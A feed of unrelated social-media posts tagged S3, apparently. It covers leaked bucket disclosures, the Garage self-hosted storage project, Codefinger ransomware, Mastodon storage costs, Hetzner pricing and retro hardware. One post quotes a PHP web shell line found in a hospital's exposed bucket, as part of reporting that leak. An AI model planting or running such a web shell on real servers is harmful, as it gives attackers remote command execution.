"It's five grand a day to miss our S3 exit"
https://world.hey.com/dhh/it-s-five-grand-a-day-to-miss-our-s3-exit-b8293563
Two days ago a #s3 bucket containing a SQL dump with data from #volkswagen #financial #services was deleted. I reported the bucket on the 9th of March, so it took them close to three weeks to fix it.
My mail with the responsible disclosure to #vw was never answered or acknowledged.
If you want to know more they did a talk at #FOSDEM 2024
- video recording: https://video.fosdem.org/2024/k3201/fosdem-2024-3009-advances-in-garage-the-low-tech-storage-platform-for-geo-distributed-clusters.mp4
#s3 #garage #DistributedStorage
/cc @deuxfleurs
I'm a fan of #garage !
It's a distributed object storage service #S3 tailored for self-hosting.
It runs on old PCs. It's built to be resilient with geographical redundancy.
They released a new version 3 weeks ago: https://git.deuxfleurs.fr/Deuxfleurs/garage/releases
How to restrict Amazon S3 bucket access to a specific IAM role: https://aws.amazon.com/blogs/security/how-to-restrict-amazon-s3-bucket-access-to-a-specific-iam-role/
New Amazon Ransomware Attack—‘Recovery Impossible’ Without Payment
A new ransomware threat, known as Codefinger, targeting users of Amazon Web Services S3 buckets, has now been confirmed.
#AWS #amazon #S3 #codefinger #ransomware #malware #security #cybersecurity #hackers #hacking #hacked
@tanepiper I would suggest #NextCloud running on a #k8s cluster connected to a local #SAN with #Amazon #S3 backup
just discovered some very cool new projects:
https://git.deuxfleurs.fr/Deuxfleurs/bagage
https://aerogramme.deuxfleurs.fr/
aerogramme is a proxy for imap and caldav that offers encryption and some security guarantees
bagage is webdav with an s3 backend
this is all based on garage which works great on commodity hardware. you could rent a $5/mo/tb vps from hosthatch and have decently good secure, open source, cloud storage of all the above
I just wanted to write a post about the most shocking major data leak fuckups revealed by awesome people at #38C3 but I can't because they just keep on adding new horrifying things
@0xF21D@infosec.exchange
Not necessarily when you factor in that #Mastodon is the absolute worst #Fedi platform on the planet for #admins and server operators.
I'm sure #Mozilla found out, like most Mastodon operators of large instances, that their #S3 storage #costs ballooned exponentially thanks to Mastodon's abject refusal to turn off media #caching for the whole #fediverse forcing admins and operators to cache and store all media -- from all #instances -- that pass through their instance.
Simply put, Mastodon fucking sucks as a fedi platform for admins and operators and I wouldn't be surprised if you don't see more larger instances folding in the next year.
It's an unsustainable architecture.
RE: https://infosec.exchange/users/0xF21D/statuses/113636032334271805
Your Impact on FreeBSD: 2024 Milestones and What’s Next
<https://freebsdfoundation.org/blog/your-impact-on-freebsd-2024-milestones-and-whats-next/> @FreeBSDFoundation
「Our work is entirely dependent on donations …」
Oh look, #Hetzner's #S3-compatible object storage is now generally available:
https://www.hetzner.com/news/object-storage
5.94 € base price per month, includes 1 TB of storage and 1 TB of egress traffic.
Additional egress traffic is 1.19 € per TB.
Additional storage is also about 5.94 € per TB and month (actually 0.007973 € per hour), and doesn't come with any included egress traffic.
https://www.hetzner.com/storage/object-storage/
All prices in my post include 19 % VAT; yours may be different depending on your country.
The advantage of open #s3 #buckets is that you sometimes can look at the code of a website.
The disadvantage is: you cannot unsee it. And sometimes that hurts…
https://infosec.exchange/@bucketchallenge/113585593228250025
Finding this code snippet in a #s3 #bucket which belongs to a hospital makes me feel chilly:
"<?eval($_POST[cmd]);?>"
Besides that, there is a link to Hospital Server - listing the admissions in real time including guardians.
The sql-dump with usernames/passwords in the s3 bucket is just a minor issue in this case.
After years of putting it off, I finally went through the box and cartons in the basement where I kept old electronic equipment "because it will come in handy someday".
Among tangles of cables for sockets no longer in use, power supplies for who knows what, memory sticks wrapped in newspaper and yellowed ball mice, I found a few treasures:
- an external Creative Modem Blaster modem connected via an RS323 serial link
- a Samsung hard drive with a staggering capacity of 1.62 gigs
- an S3 Trio64V+ graphics card, which was one of the first cards with an integrated 3D graphics accelerator
- a Sagem "soap dish" for neostrada tp
Looking for another software recommendation, I would like to find a decent #AWS #S3 compatible GUI file transfer client for #Linux that can:
- List buckets, upload & download files
- Set ACLs and generate Signed URLs
- Customizable endpoint to use with non-AWS hosts
- Available as a Flatpak or vanilla binary
Basically, Cyberduck, but for Linux.